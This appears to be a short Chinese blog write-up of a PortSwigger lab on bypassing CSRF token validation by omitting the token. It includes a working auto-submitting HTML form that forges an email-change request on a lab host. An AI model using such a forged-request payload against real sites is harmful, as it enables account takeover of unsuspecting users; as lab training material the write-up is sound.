burpsuite靶场----CSRF----token验证取决于其是否存在

burpsuite靶场----CSRF----token验证取决于其是否存在

靶场地址

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-token-being-present

正式开始

1.登录

2.抓包,发现有token

3.删掉这个csrf参数,发现无影响

但是如果换成GET方式的话不行

4.制作poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a9f00b704d2d4e583bf6f080023008d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;abc&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

5.提交

posted @ 2023-10-13 09:54  BattleofZhongDinghe  阅读(39)  评论(0编辑  收藏  举报